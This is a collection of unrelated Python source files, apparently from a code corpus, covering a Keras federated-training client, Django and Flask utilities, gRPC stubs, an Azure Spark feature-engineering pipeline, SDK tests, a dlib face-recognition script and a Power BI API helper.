known_workers=known_workers,
include_github_known_workers=include_github_known_workers,
verbose=verbose)
def fit(self,
model,
input,
target,
valid_input=None,
valid_target=None,
batch_size=1,
epochs=1,
log_interval=1,
message_handler=None,
preferred_node='random'):
if ('p2p-circuit' in preferred_node or '/' in preferred_node):
preferred_node = preferred_node.split("/")[-1]
if (preferred_node == 'random'):
nodes = self.get_openmined_nodes()
preferred_node = nodes[random.randint(0, len(nodes) - 1)]
print("PREFERRED NODE:" + str(preferred_node))
if (message_handler is None):
message_handler = self.receive_model
self.spec = self.generate_fit_spec(
model=model,
input=input,
target=target,
valid_input=valid_input,
valid_target=valid_target,
batch_size=batch_size,
epochs=epochs,
log_interval=log_interval,
preferred_node=preferred_node)
self.publish('openmined', self.spec)
self.listen_to_channel_sync(self.spec['train_channel'],
message_handler)
return self.load_model(self.spec['model_addr']), self.spec
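    # Hedged usage sketch (illustrative): training a toy Keras model over the
    # grid with fit(). The model and data below are invented for illustration;
    # only KerasClient.fit itself comes from this file.
    #
    #   from keras.models import Sequential
    #   from keras.layers import Dense
    #   import numpy as np
    #
    #   client = KerasClient()
    #   model = Sequential([Dense(1, input_dim=4)])
    #   model.compile(loss='mse', optimizer='sgd')
    #   x, y = np.random.rand(16, 4), np.random.rand(16, 1)
    #   trained_model, spec = client.fit(model, x, y, batch_size=4, epochs=2)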
def update_progress(self, parent_model, worker_id, num_epochs, epoch_id):
if parent_model not in self.progress:
self.progress[parent_model] = {}
if worker_id not in self.progress[parent_model]:
self.progress[parent_model][worker_id] = 0
p = epoch_id / num_epochs
self.progress[parent_model][worker_id] = p
return p
def max_progress(self, parent_model):
if parent_model not in self.progress:
return 0
max_progress = 0
for worker_id, progress in self.progress[parent_model].items():
if progress > max_progress:
max_progress = progress
return max_progress
def generate_fit_spec(self,
model,
input,
target,
valid_input=None,
valid_target=None,
batch_size=1,
epochs=1,
log_interval=1,
framework='keras',
model_class=None,
preferred_node='first_available'):
model_bin = keras_utils.serialize_keras_model(model)
model_addr = self.api.add_bytes(model_bin)
if model_class is not None:
self.api.add_bytes(model_class)
train_input = utils.serialize_numpy(input)
train_target = utils.serialize_numpy(target)
if (valid_input is None):
valid_input = utils.serialize_numpy(input)
else:
valid_input = utils.serialize_numpy(valid_input)
if (valid_target is None):
valid_target = utils.serialize_numpy(target)
else:
valid_target = utils.serialize_numpy(valid_target)
datasets = [train_input, train_target, valid_input, valid_target]
data_json = json.dumps(datasets)
data_addr = self.api.add_str(data_json)
spec = {}
spec['type'] = "fit"
spec['model_addr'] = model_addr
spec['data_addr'] = data_addr
spec['batch_size'] = batch_size
spec['epochs'] = epochs
spec['log_interval'] = log_interval
spec['framework'] = framework
spec['train_channel'] = 'openmined_train_' + str(model_addr)
spec['preferred_node'] = preferred_node
return spec
def load_model(self, addr):
return keras_utils.ipfs2keras(self.api, addr)
def receive_model(self, message, verbose=True):
msg = utils.unpack(message)
if (msg is not None):
if (msg['type'] == 'transact'):
return keras_utils.ipfs2keras(self.api, msg['model_addr']), msg
elif (msg['type'] == 'log'):
if (verbose):
self.print_model_update(msg)
                # Figure out if we should tell this worker to quit.
parent_model = msg['parent_model']
worker_id = msg['worker_id']
num_epochs = msg['num_epochs']
epoch_id = msg['epoch_id']
progress = self.update_progress(parent_model, worker_id,
num_epochs, epoch_id)
max_progress = self.max_progress(parent_model)
if progress < max_progress * 0.75:
quit = {}
quit['op_code'] = 'quit'
self.publish(self.spec['train_channel'] + ':' + worker_id,
quit)
def print_model_update(self, msg):
output = "Worker:" + msg['worker_id'][-5:]
output += " - Epoch " + str(msg['epoch_id']) + " of " + str(
msg['num_epochs'])
output += " - Valid Loss: " + str(msg['eval_loss'])[0:8]
print(output)
def best_models(self, task):
self.show_models = widgets.VBox(
[widgets.HBox([widgets.Label('Model Address')])])
self.listen_to_channel(channels.add_model(task), self.__added_model)
self.publish(channels.list_models, task)
return self.show_models
def __added_model(self, message):
info = self.api.get_json(message['data'])
model_addr = info['model']
hbox = widgets.HBox([widgets.Label(model_addr)])
self.show_models.children += (hbox, )
def send_model(self, name, model_addr):
task = utils.load_task(name)
update = {
'name': name,
'model': model_addr,
'task': task['address'],
'creator': self.id,
'parent': task['address']
}
update_addr = self.api.add_json(update)
self.publish(channels.add_model(name), update_addr)
print("SENDING MODEL!!!!")
def add_model(self, name, model, parent=None):
"""
Propose a model as a solution to a task.
parent - The name of the task. e.g. MNIST
model - A keras model. Down the road we should support more frameworks.
"""
task = utils.load_task(name)
p = None
if parent is None:
p = task['address']
else:
p = parent
model_addr = keras_utils.keras2ipfs(self.api, model)
update = {
'name': name,
'model': model_addr,
'task': task['address'],
'creator': self.id,
'parent': p
}
update_addr = self.api.add_json(update)
self.publish(channels.add_model(name), update_addr)
print(f"ADDED NEW MODELS WEIGHT TO {update_addr}")
# ---- File: src/search_items/models.py ----
from __future__ import unicode_literals
from django.conf import settings
from django.db import models
# Create your models here.
class Search(models.Model):
name = models.CharField(max_length=120)
link = models.CharField(max_length=120)
def __unicode__(self):
return self.name
def __str__(self):
return self.name
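# Hedged usage sketch (illustrative), e.g. from a Django shell; the URL below
# is made up.
#
#   item = Search.objects.create(name="python", link="https://example.com/python")
#   Search.objects.filter(name__icontains="py")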
# ---- Next file: grpclib stubs generated from extension.proto ----
# Generated by the Protocol Buffers compiler. DO NOT EDIT!
# source: extension.proto
# plugin: grpclib.plugin.main
import abc
import typing
import grpclib.const
import grpclib.client
if typing.TYPE_CHECKING:
import grpclib.server
import extension_pb2
class PodExtensionBase(abc.ABC):
@abc.abstractmethod
async def Unary(self, stream: 'grpclib.server.Stream[extension_pb2.UnaryReq, extension_pb2.UnaryResp]') -> None:
pass
def __mapping__(self) -> typing.Dict[str, grpclib.const.Handler]:
return {
'/podextension.PodExtension/Unary': grpclib.const.Handler(
self.Unary,
grpclib.const.Cardinality.UNARY_UNARY,
extension_pb2.UnaryReq,
extension_pb2.UnaryResp,
),
}
class PodExtensionStub:
def __init__(self, channel: grpclib.client.Channel) -> None:
self.Unary = grpclib.client.UnaryUnaryMethod(
channel,
'/podextension.PodExtension/Unary',
extension_pb2.UnaryReq,
extension_pb2.UnaryResp,
)
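# Hedged usage sketch (illustrative): calling the Unary RPC through the stub
# with a grpclib Channel. The host/port and any fields on UnaryReq are
# assumptions; check extension.proto for the real message definition.
#
#   import asyncio
#   from grpclib.client import Channel
#
#   async def call_unary():
#       channel = Channel('127.0.0.1', 50051)
#       try:
#           stub = PodExtensionStub(channel)
#           return await stub.Unary(extension_pb2.UnaryReq())
#       finally:
#           channel.close()
#
#   # asyncio.run(call_unary())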
# ---- File: RAMLFlask/Server.py (repo: nm-wu/RAMLFlask) ----
import os
from importlib import import_module
from flask import Flask
import ConfigParser
import Printer
class Server:
def __init__(self, generator, comparison, config_file='config.ini'):
# Generator class
self.gen = generator
# Comparison class
self.comp = comparison
cparse = ConfigParser.ConfigParser()
cparse.read(config_file)
self.generated_dir = os.path.join('generated')
self.routes_dir = os.path.join('routes')
self.delegates_dir = os.path.join('delegates')
if cparse.has_section('DIRECTORIES'):
if cparse.has_option('DIRECTORIES', 'generated'):
self.gen.generated_directory = cparse.get('DIRECTORIES', 'generated')
self.comp.generated_directory = cparse.get('DIRECTORIES', 'generated')
if cparse.has_option('DIRECTORIES', 'routes'):
self.gen.routes_directory = cparse.get('DIRECTORIES', 'routes')
self.comp.routes_directory = cparse.get('DIRECTORIES', 'routes')
if cparse.has_option('DIRECTORIES', 'delegates'):
self.gen.delegates_directory = cparse.get('DIRECTORIES', 'delegates')
self.comp.delegates_directory = cparse.get('DIRECTORIES', 'delegates')
def generate(self, generate=True, bind=True):
if generate == True:
self.gen.generate_code()
if bind == True:
self.gen.bind_routes()
def compare(self, p_v=True, p_r=True, p_t=True, static_validations=None, static_rtypes=None, test_in=[]):
self.comp.current_version = self.gen.current_file_name
self.comp.test_res = self.gen.test_res
self.comp.new_v_file = self.gen.new_v_file
self.comp.new_r_file = self.gen.new_r_file
if p_v == True:
out = self.comp.static_valid_analysis(static_validations)
for i in out:
Printer.info_print(i)
if p_r == True:
out = self.comp.static_rtypes_analysis(static_rtypes)
for i in out:
Printer.info_print(i)
if p_t == True:
out = self.comp.test_analysis()
for i in out:
if i[0] == 'INFO':
Printer.info_print(i[1])
else:
Printer.warn_print(i[1])
def start_server(self):
# Creates the basic Flask app
        self.app = Flask(__name__)
folder = self.gen.generated_directory.replace('/', '.').replace('\\', '.') + '.'
while folder[0] == '.':
folder = folder[1:]
while folder[-1] == '.':
folder = folder[:-1]
module = import_module(folder + '.route_mappings', 'route_imports')
self.app.register_blueprint(module.route_imports, url_prefix='')
self.app.run()
def exec_all(self):
self.generate(True, True)
self.compare(True, True, True)
        self.start_server()
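# Hedged usage sketch (illustrative). Generator and Comparison are the
# collaborator objects this Server expects; their import paths below are
# assumptions and may differ in the actual project.
#
#   from RAMLFlask.Generator import Generator
#   from RAMLFlask.Comparison import Comparison
#
#   server = Server(Generator(), Comparison(), config_file='config.ini')
#   server.exec_all()   # generate, bind, compare, then serve with Flask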
# ---- Next file: waf build tool (src2cpp task) ----
from waflib.Task import Task
class src2cpp(Task):
run_str = '${SRC[0].abspath()} ${SRC[1].abspath()} ${TGT}'
color = 'PINK'
from waflib.TaskGen import extension
@extension('.src')
def process_src(self, node):
tg = self.bld.get_tgen_by_name('comp')
comp = tg.link_task.outputs[0]
tsk = self.create_task('src2cpp', [comp, node], node.change_ext('.cpp'))
self.source.extend(tsk.outputs)
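# Hedged usage sketch (illustrative): a minimal wscript build() relying on the
# extension above. It assumes a task generator named 'comp' builds the
# converter program, matching the get_tgen_by_name('comp') lookup; file names
# are made up.
#
#   def build(bld):
#       bld.program(source='comp.cpp', target='comp', name='comp')
#       bld.program(source='main.cpp generated.src', target='app')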
# ---- Next file: Spark ETL and feature engineering script ----
#################################
# This script performs the data loading, data preparation and feature engineering.
# It takes two arguments:
# 1. The configuration file which contains the Azure
# storage account name, key and data source location.
# By default, it is "./Config/storageconfig.json"
# 2. a DEBUG argument which is a string.
# If set to "FILTER_IP", the filtering down two IP addresses takes effect.
# By default, it is "FALSE".
################################
import os
import sys
import time
import datetime
import json
from pandas.tseries.holiday import USFederalHolidayCalendar
from util import write_blob,read_blob
import pyspark
from pyspark import SparkConf
from pyspark import SparkContext
from pyspark import SQLContext
import pyspark.sql.functions as F
from pyspark.sql.functions import concat, col, udf, lag, date_add, explode, lit, unix_timestamp
from pyspark.sql.functions import year, month, weekofyear, dayofmonth, hour, date_format
from pyspark.sql.types import *
from pyspark.sql.types import DateType
from pyspark.sql.dataframe import *
from pyspark.sql.window import Window
from pyspark.sql import Row
from pyspark.ml.classification import *
from pyspark.ml.feature import StringIndexer, OneHotEncoder, VectorAssembler, VectorIndexer
from pyspark.ml.feature import StandardScaler, PCA, RFormula
from pyspark.ml import Pipeline, PipelineModel
from pyspark.sql.types import Row
from pyspark.mllib.linalg import DenseVector
from azureml.logging import get_azureml_logger
# initialize logger
run_logger = get_azureml_logger()
run_logger.log("amlrealworld.bigdata.etl",True)
# load storage configuration
configFilename = "./Config/storageconfig.json"
if len(sys.argv) > 1:
configFilename = sys.argv[1]
with open(configFilename) as configFile:
config = json.load(configFile)
global storageAccount, storageContainer, storageKey, dataFile, duration
storageAccount = config['storageAccount']
storageContainer = config['storageContainer']
storageKey = config['storageKey']
dataFile = config['dataFile']
duration = config['duration']
print("storageContainer " + storageContainer)
DEBUG = 'FALSE'
#'FILTER_IP'
# 3 use a few IP 'FILTER_IP'
if len(sys.argv) > 2:
DEBUG = sys.argv[2]
# 'ONE_MONTH' use a month's data
# 'ONE_YEAR' use a year's data
# 'ALL_YEAR' use all year's data
# 'FULL' use full dataset with duplicated data copies
#path to save the intermediate results and models
path = "wasb://{}@{}.blob.<EMAIL>.windows.net/".format(storageContainer, storageAccount)
# location of the intermediate results
mlSourceDFFile = path + 'mlSource.parquet'
# location of the models
stringIndexModelFile = path + 'stringIndexModel'
oneHotEncoderModelFile = path + 'oneHotEncoderModel'
featureScaleModelFile = path + 'featureScaleModel'
infoFile = "info"
info = None
if duration == 'ONE_MONTH':
trainBegin = '2016-06-01 00:00:00'
trainEnd = '2016-06-30 23:59:59'
testSplitStart = '2016-06-29 00:00:00'
info = {"trainBegin":trainBegin, "trainEnd": trainEnd, "testSplitStart": testSplitStart, "dataFile": dataFile, "duration": duration}
if duration == 'FULL':
trainBegin = '2009-01-01 00:00:00'
trainEnd = '2016-06-30 23:59:59'
testSplitStart = '2016-06-01 00:00:00'
info = {"trainBegin":trainBegin, "trainEnd": trainEnd, "testSplitStart": testSplitStart, "dataFile": dataFile, "duration": duration}
# start Spark session
spark = pyspark.sql.SparkSession.builder.appName('etl').getOrCreate()
def attach_storage_container(spark, account, key):
config = spark._sc._jsc.hadoopConfiguration()
setting = "fs.azure.account.key." + account + ".blob.core.windows.net"
if not config.get(setting):
config.set(setting, key)
# attach the blob storage to the spark cluster or VM so that the storage can be accessed by the cluste or VM
attach_storage_container(spark, storageAccount, storageKey)
# print runtime versions
print ('****************')
print ('Python version: {}'.format(sys.version))
print ('Spark version: {}'.format(spark.version))
print(spark.sparkContext.getConf().getAll())
print ('****************')
# load csv files in blob storage into Spark dataframe
# import time
print(time.time())
dataFileSep = ','
print(dataFile)
run_logger.log("reading file from ", dataFile)
df = spark.read.csv(dataFile, header=False, sep=dataFileSep, inferSchema=True, nanValue="", mode='PERMISSIVE')
print(time.time())
# rename the columns
oldnames = df.columns
newColumns=['TrafficType',"SessionStart","SessionEnd", "ConcurrentConnectionCounts", "MbytesTransferred",
"ServiceGrade","HTTP1","ServerType",
"SubService_1_Load","SubSerivce_2_Load", "SubSerivce_3_Load",
"SubSerivce_4_Load", "SubSerivce_5_Load", "SecureBytes_Load", "TotalLoad", 'ServerIP', 'ClientIP']
newdf = df.select([col(oldnames[index]).alias(newColumns[index]) for index in range(0,len(oldnames))])
if DEBUG == "FILTER_IP":
IPList={'172.16.17.32','192.168.3.11'}
filterdf = newdf.filter(newdf["ServerIP"].isin(IPList) == True)
newdf = filterdf
# add per five minutes feature
seconds = 300
seconds_window = F.from_unixtime(F.unix_timestamp('SessionStart') - F.unix_timestamp('SessionStart') % seconds)
newdf = newdf.withColumn('SessionStartFiveMin', seconds_window.cast('timestamp'))
# aggregate per five minutes
newdf.createOrReplaceTempView("newdf")
sqlStatement = """
SELECT ServerIP, SessionStartFiveMin ,
sum(TotalLoad) SumTotalLoad, count(*) NumSession,
sum(MbytesTransferred) SumMBytes,
sum(SubService_1_Load) SumLoad1, sum(SubSerivce_2_Load) SumLoad2, sum(SubSerivce_3_Load) SumLoad3,
sum(SubSerivce_4_Load) SumLoad4, sum(SubSerivce_5_Load) SumLoad5, sum(SecureBytes_Load) SumLoadSecure
FROM newdf group by ServerIP, SessionStartFiveMin
"""
aggregatedf = spark.sql(sqlStatement);
aggregatedf.cache()
#########################
# Create the time series of five-minute buckets
# UDF
def generate_date_series(start, stop, window=300):
begin = start - start%window
end = stop - stop%window + window
return [begin + x for x in range(0, end-begin + 1, window)]
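# For example, with 300-second buckets generate_date_series(1000, 1700, 300)
# returns [900, 1200, 1500, 1800]: every bucket boundary spanning the interval.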
# Register UDF for later usage
spark.udf.register("generate_date_series", generate_date_series, ArrayType(IntegerType()) )
sqlStatement = """ SELECT explode( generate_date_series( UNIX_TIMESTAMP('{0!s}', "yyyy-MM-dd HH:mm:ss"),
UNIX_TIMESTAMP('{1!s}', 'yyyy-MM-dd HH:mm:ss')) )
""".format(info['trainBegin'], info['trainEnd'])
timeDf = spark.sql(sqlStatement)
timeDf=timeDf.withColumn("Time", col('col').cast(TimestampType()))
numRowsinTimeDF=timeDf.count()
run_logger.log("numRowsinTimeDF", numRowsinTimeDF)
timeDf.persist()
##########################
# join the timeDf to form dataframe with each per-five-minute bucket filled with proper data or null
joindf = timeDf.join(aggregatedf, aggregatedf.SessionStartFiveMin==timeDf.Time, "outer")
# add hour feature
secondsInHour = 3600
hour_window = F.from_unixtime(F.unix_timestamp('SessionStartFiveMin') - F.unix_timestamp('SessionStartFiveMin') % secondsInHour)
joindf = joindf.withColumn('SessionStartHourTime', hour_window.cast('timestamp'))
#aggregatedf = aggregatedf.withColumn('SessionStartHourTime', col('SessionStartHour').cast('timestamp'))
joindf = joindf.withColumn("key", concat(joindf.ServerIP,lit("_"),joindf.SessionStartHourTime.cast('string')))
joindf.cache()
joindf = joindf.fillna(0, subset=['SumTotalLoad'])
# get the peakload every five minutes (non-overlapping) per hour
maxByGroup = (joindf.rdd
.map(lambda x: (x[-1], x)) # Convert to PairwiseRD
# Take maximum of the passed arguments by the last element (key)
# equivalent to:
# lambda x, y: x if x[-1] > y[-1] else y
# 4 is the SumTotalLoad
.reduceByKey(lambda x1, x2: max(x1, x2, key=lambda x: x[4]))
.values()) # Drop keys
aggregatemaxdf = maxByGroup.toDF()
featureeddf = None
aggregatemaxdf.createOrReplaceTempView("aggregatemaxdf")
sqlStatement = """
SELECT key, ServerIP, SessionStartHourTime,
SumTotalLoad peakLoad,
SumMBytes peakBytes,
SumLoad1 peakLoad1, SumLoad2 peakLoad2, SumLoad3 peakLoad3,
SumLoad4 peakLoad4, SumLoad5 peakLoad5, SumLoadSecure peakLoadSecure
FROM aggregatemaxdf
"""
featureeddf = spark.sql(sqlStatement);
############################################
# Extract some time features from "SessionStartHourTime" column
featureeddf = featureeddf.withColumn('year', year(featureeddf['SessionStartHourTime']))
featureeddf = featureeddf.withColumn('month', month(featureeddf['SessionStartHourTime']))
featureeddf = featureeddf.withColumn('weekofyear', weekofyear(featureeddf['SessionStartHourTime']))
featureeddf = featureeddf.withColumn('dayofmonth', dayofmonth(featureeddf['SessionStartHourTime']))
featureeddf = featureeddf.withColumn('hourofday', hour(featureeddf['SessionStartHourTime']))
dayofweek = F.date_format(featureeddf['SessionStartHourTime'], 'EEEE')
featureeddf = featureeddf.withColumn('dayofweek', dayofweek )
# add day feature
day = 3600*24
day_window = F.from_unixtime(F.unix_timestamp('SessionStartHourTime') - F.unix_timestamp('SessionStartHourTime') % day)
featureeddf = featureeddf.withColumn('SessionStartDay', day_window)
# aggregate daily
featureeddf.createOrReplaceTempView("featureeddf")
sqlStatement = """
SELECT ServerIP d_ServerIP, SessionStartDay d_SessionStartDay,
AVG(peakLoad) peakLoadDaily,
AVG(peakBytes) peakBytesDaily,
AVG(peakLoad1) peakLoad1Daily, AVG(peakLoad2) peakLoad2Daily, AVG(peakLoad3) peakLoad3Daily,
AVG(peakLoad4) peakLoad4Daily, AVG(peakLoad5) peakLoad5Daily, AVG(peakLoadSecure) peakLoadSecureDaily
FROM featureeddf group by ServerIP, SessionStartDay
"""
dailyStatisticdf = spark.sql(sqlStatement);
# lag features
# previous week average
# rolling mean features with a 2-day (48-hour) lag
rollingLags = [2]
lagColumns = [x for x in dailyStatisticdf.columns if 'Daily' in x]
windowSize=[7]
for w in windowSize:
for i in rollingLags:
wSpec = Window.partitionBy('d_ServerIP').orderBy('d_SessionStartDay').rowsBetween(-i-w, -i-1)
for j in lagColumns:
dailyStatisticdf = dailyStatisticdf.withColumn(j+'Lag'+str(i)+'Win'+str(w),F.avg(col(j)).over(wSpec) )
selectColumn = ['d_ServerIP', 'd_SessionStartDay']
selectColumn.extend([x for x in dailyStatisticdf.columns if 'Lag' in x])
dailyStatisticdf = dailyStatisticdf.select(selectColumn)
dailyStatisticdf = dailyStatisticdf.withColumn("d_key2", concat(dailyStatisticdf.d_ServerIP,lit("_"),dailyStatisticdf.d_SessionStartDay.cast('string')))
featureeddf = featureeddf.withColumn("d_key2", concat(featureeddf.ServerIP,lit("_"),featureeddf.SessionStartDay.cast('string')))
dailyStatisticdf.cache()
# Single column join is much faster than two columns join
featureeddf = featureeddf.join(dailyStatisticdf, (featureeddf.d_key2 == dailyStatisticdf.d_key2),
'outer' )
featureeddf.show(1)
featureeddf.persist()
featureeddf = featureeddf.select([x for x in featureeddf.columns if 'd_' not in x ])
################################
trainBeginTimestamp = int(datetime.datetime.strftime( datetime.datetime.strptime(info['trainBegin'], "%Y-%m-%d %H:%M:%S") ,"%s"))
def linearTrend(x):
if x is None:
return 0
    # return the (fractional) number of years since the start of the training period
return (x-trainBeginTimestamp)/3600/24/365.25
#
linearTrendUdf = udf(linearTrend,IntegerType())
featureeddf = featureeddf.withColumn('linearTrend',linearTrendUdf(F.unix_timestamp('SessionStartHourTime')))
# use the following two dates as the range [holidayBegin, holidayEnd] for calculating US federal holidays
holidayBegin = '2009-01-01'
holidayEnd='2016-06-30'
cal = USFederalHolidayCalendar()
holidays_datetime = cal.holidays(start=holidayBegin, end=holidayEnd).to_pydatetime()
holidays = [t.strftime("%Y-%m-%d") for t in holidays_datetime]
def isHoliday(x):
if x is None:
return 0
if x in holidays:
return 1
else:
return 0
isHolidayUdf = udf (isHoliday, IntegerType())
featureeddf= featureeddf.withColumn('date', date_format(col('SessionStartHourTime'), 'yyyy-MM-dd'))
featureeddf = featureeddf.withColumn("Holiday",isHolidayUdf('date'))
#featureeddf.select(['date', 'Holiday'],).dropDuplicates().orderBy('date').show(20)
def isBusinessHour(x):
if x is None:
return 0
if x >=8 and x <=18:
return 1
else:
return 0
isBusinessHourUdf = udf (isBusinessHour, IntegerType())
featureeddf = featureeddf.withColumn("BusinessHour",isBusinessHourUdf('hourofday'))
def isMorning(x):
if x is None:
return 0
if x >=6 and x <=9:
return 1
else:
return 0
isMorningUdf = udf (isMorning, IntegerType())
featureeddf = featureeddf.withColumn("Morning",isMorningUdf('hourofday'))
dfLen = featureeddf.count()
featureeddf.persist()
###############################
# lag features
previousWeek=int(24*7)
previousMonth=int(24*365.25/12)
lags=[48, 49, 50, 51, 52, 55, 60, 67, 72, 96]
lags.extend([previousWeek, previousMonth])
lagColumns = ['peakLoad']
for i in lags:
wSpec = Window.partitionBy('ServerIP').orderBy('SessionStartHourTime')
for j in lagColumns:
featureeddf = featureeddf.withColumn(j+'Lag'+str(i),lag(featureeddf[j], i).over(wSpec) )
mlSourceDF = featureeddf
mlSourceDF.printSchema()
mlSourceDF=mlSourceDF.fillna(0, subset= [x for x in mlSourceDF.columns if 'Lag' in x])
# after creating all lag features, we can drop NA columns on the key columns
# drop na to avoid error in StringIndex
mlSourceDF = mlSourceDF.na.drop(subset=["ServerIP","SessionStartHourTime"])
# indexing
columnsForIndex = ['dayofweek', 'ServerIP', 'year', 'month', 'weekofyear', 'dayofmonth', 'hourofday',
'Holiday', 'BusinessHour', 'Morning']
mlSourceDF=mlSourceDF.fillna(0, subset= [x for x in columnsForIndex ])
sIndexers = [StringIndexer(inputCol=x, outputCol=x + '_indexed').setHandleInvalid("skip") for x in columnsForIndex]
indexModel = Pipeline(stages=sIndexers).fit(mlSourceDF)
mlSourceDF = indexModel.transform(mlSourceDF)
# save model for operationalization
indexModel.write().overwrite().save(stringIndexModelFile)
# encoding for categorical features
catVarNames=[x + '_indexed' for x in columnsForIndex ]
columnOnlyIndexed = [ catVarNames[i] for i in range(0,len(catVarNames)) if len(indexModel.stages[i].labels)<2 ]
columnForEncode = [ catVarNames[i] for i in range(0,len(catVarNames)) if len(indexModel.stages[i].labels)>=2 ]
info['columnOnlyIndexed'] = columnOnlyIndexed
info['columnForEncode'] = columnForEncode
# save info to blob storage
write_blob(info, infoFile, storageContainer, storageAccount, storageKey)
ohEncoders = [OneHotEncoder(inputCol=x, outputCol=x + '_encoded')
for x in columnForEncode ]
ohPipelineModel = Pipeline(stages=ohEncoders).fit(mlSourceDF)
mlSourceDFCat = ohPipelineModel.transform(mlSourceDF)
ohPipelineModel.write().overwrite().save(oneHotEncoderModelFile)
# feature scaling for numeric features
featuresForScale = [x for x in mlSourceDFCat.columns if 'Lag' in x]
print(len(featuresForScale))
assembler = VectorAssembler(
inputCols=featuresForScale, outputCol="features"
)
assembled = assembler.transform(mlSourceDFCat).select(col('key'), col('features'))
scaler = StandardScaler(
inputCol="features", outputCol="scaledFeatures",
withStd=True, withMean=False
).fit(assembled)
scaler.write().overwrite().save(featureScaleModelFile)
scaledData = scaler.transform(assembled).select('key','scaledFeatures')
def extract(row):
return (row.key, ) + tuple(float(x) for x in row.scaledFeatures.values)
rdd = scaledData.rdd.map(lambda x: Row(key=x[0],scaledFeatures=DenseVector(x[1].toArray())))
scaledDf = rdd.map(extract).toDF(["key"])
# rename columns
oldColumns = scaledDf.columns
scaledColumns = ['scaledKey']
scaledColumns.extend(['scaled'+str(i) for i in featuresForScale])
scaledOutcome = scaledDf.select([col(oldColumns[index]).alias(scaledColumns[index]) for index in range(0,len(oldColumns))])
noScaledMLSourceDF = mlSourceDFCat.select([column for column in mlSourceDFCat.columns if column not in featuresForScale])
newDF = noScaledMLSourceDF.join(scaledOutcome, noScaledMLSourceDF.key==scaledOutcome.scaledKey, 'outer')
newDF.cache()
mlSourceDFCat = newDF
mlSourceDFCat=mlSourceDFCat.fillna(0, subset= [x for x in mlSourceDFCat.columns if 'Lag' in x])
mlSourceDFCat=mlSourceDFCat.fillna(0, subset= ['linearTrend'])
## save the intermediate result for downstream work
mlSourceDFCat.write.mode('overwrite').parquet(mlSourceDFFile)
#spark.stop()
| StarcoderdataPython |
4813536 | import json
from storyhub.sdk.service.Argument import Argument
from storyhub.sdk.service.HttpOptions import HttpOptions
from storyhub.sdk.service.output.OutputAction import OutputAction
from tests.storyhub.sdk.JsonFixtureHelper import JsonFixtureHelper
output_action_fixture = JsonFixtureHelper.load_fixture("output_action_fixture")
output_action_fixture_json = json.dumps(output_action_fixture)
def test_deserialization(mocker):
mocker.patch.object(json, "loads", return_value=output_action_fixture)
mocker.patch.object(HttpOptions, "from_dict")
mocker.patch.object(Argument, "from_dict")
assert (
OutputAction.from_json(jsonstr=output_action_fixture_json) is not None
)
json.loads.assert_called_with(output_action_fixture_json)
HttpOptions.from_dict.assert_called_with(
data={"http_options": output_action_fixture["output_action"]["http"]}
)
Argument.from_dict.assert_called_with(
data={
"name": "flush",
"argument": output_action_fixture["output_action"]["arguments"][
"flush"
],
}
)
def test_serialization(mocker):
mocker.patch.object(json, "dumps", return_value=output_action_fixture_json)
service_event = OutputAction.from_dict(data=output_action_fixture)
assert service_event.as_json(compact=True) is not None
json.dumps.assert_called_with(output_action_fixture, sort_keys=True)
assert service_event.as_json() is not None
json.dumps.assert_called_with(
output_action_fixture, indent=4, sort_keys=True
)
def test_getters(mocker):
output_action = OutputAction.from_json(jsonstr=output_action_fixture_json)
assert output_action.help() == "No help available."
| StarcoderdataPython |
3295790 | # -*- coding: UTF-8 -*-
import sys,os,dlib,glob,numpy
from skimage import io
import cv2
import imutils
import php
my = php.kit()
if len(sys.argv) != 2:
    print("Missing the name of the image to recognize")
    exit()
# Path to the 68-point facial landmark model
predictor_path = "shape_predictor_68_face_landmarks.dat"
# Path to the face recognition model
face_rec_model_path = "dlib_face_recognition_resnet_model_v1.dat"
# Folder of face images used for comparison
faces_folder_path = "./rec/pic"
# Folder of precomputed face descriptors used for comparison
faces_numpy_folder_path = "./rec/numpy"
# Name of the face image to recognize
img_path = sys.argv[1]
# Load the face detector
detector = dlib.get_frontal_face_detector()
# Load the facial landmark predictor
sp = dlib.shape_predictor(predictor_path)
# Load the face recognition model
facerec = dlib.face_recognition_model_v1(face_rec_model_path)
# List of face descriptors to compare against
descriptors = []
# List of candidate (person) names to compare against
candidate = []
# Compare against every face in the comparison folder:
# 1. face detection
# 2. landmark detection
# 3. obtain the descriptor
for f in my.glob(faces_numpy_folder_path + "\\*.npy"):
    base = os.path.basename(f)
    # Take the person's name from the file name
    candidate.append(os.path.splitext(base)[0])
    # from : https://ithelp.ithome.com.tw/articles/10196167
    v = numpy.load(f)
    descriptors.append(v)
# Process the face image to be recognized in the same way
img = io.imread(img_path)
dets = detector(img, 1)
dist = []
for k, d in enumerate(dets):
shape = sp(img, d)
face_descriptor = facerec.compute_face_descriptor(img, shape)
#print(face_descriptor);
#print(dir(face_descriptor))
#sys.exit()
d_test = numpy.array(face_descriptor)
x1 = d.left()
y1 = d.top()
x2 = d.right()
y2 = d.bottom()
    # Mark the detected face with a rectangle
cv2.rectangle(img, (x1, y1), (x2, y2), ( 0, 255, 0), 4, cv2. LINE_AA)
    # Compute the Euclidean distance to every stored descriptor
for i in descriptors:
dist_ = numpy.linalg.norm(i -d_test)
dist.append(dist_)
# Combine the candidate names and their Euclidean distances into a dict
c_d = dict( zip(candidate,dist))
#dir(c_d)
#print(dir(c_d))
#print(c_d)
#sys.exit()
# Sort by Euclidean distance in ascending order
#cd_sorted = sorted(c_d.iteritems(), key = lambda d:d[ 1])
cd_sorted = sorted(c_d.items(), key=lambda kv: kv[1])
# The candidate with the shortest distance is the recognized person
rec_name = cd_sorted[ 0][ 0]
# Draw the recognized name on the image
cv2.putText(img, rec_name, (x1, y1), cv2. FONT_HERSHEY_SIMPLEX , 1, ( 255, 255, 255), 2, cv2. LINE_AA)
img = imutils.resize(img, width = 600)
img = cv2.cvtColor(img,cv2. COLOR_BGR2RGB)
cv2.imshow( "Face Recognition", img)
# Press any key to close the program
cv2.waitKey( 0)
cv2.destroyAllWindows() | StarcoderdataPython |
3359713 | <filename>Python/Encrypt credentials/Encryption sample/services/getdatasource.py
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import requests
class GetDatasourceService:
headers = None
def get_datasources_in_group(self, access_token, group_id, dataset_id):
''' Returns all the data sources from the given group
Args:
access_token (str): Access token to call API
group_id (str): Group Id
dataset_id (str): Dataset Id
Returns:
Response: Response from the API call
'''
self.headers = {'Content-Type': 'application/json', 'Authorization': 'Bearer ' + access_token}
# https://docs.microsoft.com/en-us/rest/api/power-bi/datasets/getdatasourcesingroup
endpoint_url = f'https://api.powerbi.com/v1.0/myorg/groups/{group_id}/datasets/{dataset_id}/datasources'
